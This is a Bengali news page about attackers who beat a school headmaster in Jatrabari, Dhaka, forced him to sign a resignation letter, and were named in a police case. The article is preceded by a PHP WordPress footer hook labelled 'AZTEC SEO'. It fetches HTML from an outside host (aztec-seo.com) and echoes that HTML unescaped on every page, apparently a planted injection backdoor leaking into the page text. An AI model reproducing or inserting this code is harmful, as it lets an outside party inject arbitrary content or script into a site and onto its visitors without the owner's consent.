/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); প্রধান শিক্ষককে মারধর করে পদত্যাগপত্রে সই, থানায় মামলা | Dhaka Sky News

হাম ও উপসর্গ নিয়ে দেশে আরও ১২ জনের মৃত্যু

আগের সংবাদ

কুয়েতের জ্বালানি কেন্দ্রে ইরানের ড্রোন হামলা, ব্যাপক ক্ষয়ক্ষতি

পরের সংবাদ

প্রধান শিক্ষককে মারধর করে পদত্যাগপত্রে সই, থানায় মামলা

রাজধানীর যাত্রাবাড়ীর সবুজ বিদ্যাপীঠ স্কুল অ্যান্ড কলেজে ঢুকে প্রধান শিক্ষককে চড়-থাপ্পড় ও কিল-ঘুসি মেরে জোরপূর্বক পদত্যাগপত্রে সই নেওয়ার অভিযোগ পাওয়া গেছে।

রোববার (৫ এপ্রিল) দুপুরে স্কুলের অ্যাডহক কমিটির সভাপতির নামের তালিকাকে কেন্দ্র করে এলাকার চিহ্নিত সন্ত্রাসীরা এ ঘটনা ঘটায়।

এ ঘটনায় ভুক্তভোগী প্রধান শিক্ষক (ভারপ্রাপ্ত) এবিএম মিরাজুল ইসলাম বাদী হয়ে মজিবুর রহসান মধু, সাইফুল ইসলাম বাবু, তুহিন ইসলাম ও নয়নের নাম উল্লেখ করে অজ্ঞাতনামা আরও ৭-৮ জনকে আসামি করে যাত্রাবাড়ী থানায় মামলা দায়ের করেছেন।

অভিযোগ সূত্রে জানা গেছে, রোববার দুপুর সাড়ে ১২টার দিকে রাজধানীর উত্তর যাত্রাবাড়ী এলাকার ১১-১২ জন চিহ্নিত সন্ত্রাসী সবুজ বিদ্যাপীঠ স্কুল অ্যান্ড কলেজে ঢুকে বিদ্যালয় অ্যাডহক কমিটির সভাপতির নামের তালিকায় তাদের পছন্দের নাম না থাকায় প্রধান শিক্ষক এবিএম মিরাজুল ইসলামকে তার কক্ষে আটকিয়ে দরজা-জানালা বন্ধ করে সিসি ক্যামেরা ভাংচুর করে এবং প্রধান শিক্ষককে চর-থাপ্পড়, কিল-ঘুসিসহ বিভিন্ন কায়দায় মারধর করে জোরপূর্বক পদত্যাগপত্রে স্বাক্ষর করিয়ে নেয়।
এ সময় অন্য শিক্ষকদেরও ধাক্কা ও হুমকি দিয়ে কক্ষ থেকে বের করে দেওয়া হয়। এ ঘটনা কাউকে না জানানো এবং প্রধান শিক্ষককে পরিবার নিয়ে এলাকা ছাড়ারও হুমকি দেয় হামলাকারীরা।

ভুক্তভোগী প্রধান শিক্ষক তার পরিবার নিয়ে এখন আতঙ্কে রয়েছেন।

যাত্রাবাড়ী থানার ওসি মোহাম্মদ রাজু যুগান্তরকে বলেন, সবুজ বিদ্যাপীঠ স্কুল অ্যান্ড কলেজের অ্যাডহক কমিটির সভাপতির নামের তালিকাকে কেন্দ্র করে বিদ্যালয়ের প্রধান শিক্ষকের ওপর হামলা, জোর করে পদত্যাগপত্রে স্বাক্ষর এবং হুমকির ঘটনায় প্রধান শিক্ষক অভিযোগ করেছেন। তদন্তপূর্বক আইনগত ব্যবস্থা নেওয়া হবে।